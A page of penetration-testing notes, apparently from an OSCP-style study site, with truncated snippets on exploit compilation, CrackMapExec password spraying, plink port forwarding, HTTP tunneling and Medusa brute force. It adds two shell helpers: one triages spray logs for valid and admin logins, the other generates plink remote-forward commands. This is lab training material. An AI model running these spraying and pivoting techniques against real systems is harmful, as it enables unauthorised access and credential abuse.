Shuciran Pentesting Notes

GCC Compilation

Basic Compilation
gcc -o exploit exploit.c
32-Bit Compilation
gcc -m32 -Wl,--hash-style=both -o exploit exploit.c
-m32 produces a 32-bit binary on a 64-bit Kali (the multilib packages, e.g. gcc-multilib, must be installed). -Wl,--hash-style=both makes the linker emit both the classic SysV (.hash) and the GNU (.gnu.hash) symbol tables, so the exploit also loads on older targets whose dynamic linker does not understand the GNU-only hash style.

Automated Enumeration (Windows)

WinPeas
On Windows, one automated script is WinPeas.
Windows-Privesc-Check
Another automated script is windows-privesc-check, which can be found in the windows-privesc-check We’ll specify the self...

Uploads Using Windows Scripting Languages

In certain scenarios, we may need to exfiltrate data from a target network using a Windows client. This can be complex since standard TFTP, FTP, and HTTP servers are rarely enabled on Windows by de...

Crackmapexec

SMB
crackmapexec smb 10.10.11.158 -u users -p creds
Example: [[StreamIO#^11d8df]]
LDAP
crackmapexec ldap 10.10.11.158 -u users -p creds --continue-on-success
[[StreamIO#^676765]]
WINRM
crackmap...
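When a spray with -u users -p creds runs against several protocols, the useful part of the output is the handful of [+] lines. The script below is an added example, not part of the original notes: it pulls valid logins out of a saved CrackMapExec log, separates the ones flagged Pwn3d! (local admin), and lists the distinct users that have at least one working password. The log lines are a constructed sample in the CME line format; the host, domain, usernames and passwords are invented.

```shell
#!/bin/sh
# Added example (not from the original notes): triage a saved CrackMapExec
# spray log. cme_sample is a CONSTRUCTED log in the CME line format; the
# domain, users and passwords are invented.
cme_sample() {
  cat <<'EOF'
SMB         10.10.11.158    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamio.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [-] streamio.htb\alice:Winter2022 STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [+] streamio.htb\bob:Summer2022
SMB         10.10.11.158    445    DC               [+] streamio.htb\admin:P@ssw0rd! (Pwn3d!)
LDAP        10.10.11.158    389    DC               [+] streamio.htb\bob:Summer2022
WINRM       10.10.11.158    5985   DC               [-] streamio.htb\bob:Summer2022
WINRM       10.10.11.158    5985   DC               [+] streamio.htb\admin:P@ssw0rd! (Pwn3d!)
EOF
}

# Read a CME log on stdin; print "PROTO host user:pass" for every [+] line,
# with a trailing "admin" marker when CME reported Pwn3d!.
cme_valid_logins() {
  awk '$5 == "[+]" {
      cred = $6
      flag = ($0 ~ /Pwn3d!/) ? " admin" : ""
      print $1, $2, cred flag
  }'
}

# Distinct accounts with at least one valid password, whatever the protocol.
cme_unique_users() {
  cme_valid_logins | awk '{ split($3, c, ":"); print c[1] }' | sort -u
}

# Only the protocol/host pairs where the account is local admin: these are
# the ones worth spending a psexec/winrm shell on.
cme_admin_access() {
  cme_valid_logins | awk '$4 == "admin" { print $1, $2, $3 }'
}

# Usage: cme_sample | cme_valid_logins ; cme_sample | cme_admin_access
# With a real run: crackmapexec smb ... | tee spray.log ; cme_admin_access < spray.log
```

The three functions all take the log on stdin, so the same filters work on `tee`'d output from a live spray. Note that --continue-on-success is needed on the LDAP/WinRM runs for the log to contain more than the first hit per user.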

Plink

During the enumeration and information gathering process, we discover a MySQL service running on TCP port 3306.
C:\Windows\system32>netstat -anpb TCP
Active Connections
P...
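The reason plink is needed here is that the service is bound to 127.0.0.1, so it is unreachable from Kali without a remote port forward. The script below is an added example, not part of the original notes: it filters a "netstat -anpb TCP" listing down to the loopback-only listeners and prints, for each, the plink remote forward that would expose it on the attacking machine. The netstat listing is a constructed sample; the Kali address 10.11.0.4, the user "kali" and the password placeholder are assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): find services that only listen
# on 127.0.0.1 and build the matching plink -R command. netstat_sample is a
# CONSTRUCTED "netstat -anpb TCP" listing; only port 3306 comes from the notes.
netstat_sample() {
  cat <<'EOF'
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TermService
 [svchost.exe]
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING
 [mysqld.exe]
  TCP    127.0.0.1:5040         0.0.0.0:0              LISTENING
  CDPSvc
 [svchost.exe]
  TCP    10.11.0.22:49671       10.11.0.4:22           ESTABLISHED
 [plink.exe]
EOF
}

# Read netstat output on stdin (CRLF tolerated); print the port of every TCP
# listener bound to 127.0.0.1, i.e. reachable only from the host itself.
loopback_listen_ports() {
  tr -d '\r' | awk '$1 == "TCP" && $4 == "LISTENING" && $2 ~ /^127\.0\.0\.1:/ {
      split($2, a, ":"); print a[2]
  }'
}

# Build the plink remote forward that publishes <port> on the Kali box:
#   plink.exe -ssh -l <user> -pw <password> -R <port>:127.0.0.1:<port> <kali_ip>
# Arguments: kali_ip kali_user port. The password is left as a placeholder
# rather than embedded; kali_ip/kali_user are assumed values.
plink_remote_forward() {
  kali_ip=$1; kali_user=$2; port=$3
  printf 'plink.exe -ssh -l %s -pw <password> -R %s:127.0.0.1:%s %s\n' \
    "$kali_user" "$port" "$port" "$kali_ip"
}

# One plink command per loopback-only listener found in the listing on stdin.
plink_commands() {
  loopback_listen_ports | while read -r port; do
    plink_remote_forward "$1" "$2" "$port"
  done
}

# Usage: netstat_sample | plink_commands 10.11.0.4 kali
```

After the forward is up, the service answers on 127.0.0.1:<port> of the Kali machine (e.g. mysql -h 127.0.0.1 -P 3306 for the case in the notes). Remember that plink prompts to cache the SSH host key; pipe "echo y |" in front of the command when running it non-interactively from a reverse shell.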

NETSH

For this to work, the Windows system must have the IP Helper service running and IPv6 support must be enabled for the interface we want to use. Fortunately, both are on and enabled by default on Wi...

HTTP Tunneling Through Deep Packet Inspection

Our goal is to initiate a remote desktop connection from our Kali Linux machine to the Windows Server 2016 through the compromised Linux server using only the HTTP protocol. We will rely on HTTPTu...

Network Service Attack Methods

HTTP htaccess Attack with Medusa
We will attempt to gain access to an htaccess-protected folder, /admin, on that server. Next, we will launch medusa and initiate the attack against the htaccess-p...

Rinetd

We will use a port forwarding tool called rinetd to redirect traffic on our Kali Linux server. This tool is easy to configure, available in the Kali Linux repositories, and is easily installed with...

Kernel Vulnerabilities via Drivers

When attempting to exploit system-level software (such as drivers or the kernel itself), we must pay careful attention to several factors including the target’s operating system, version, and archi...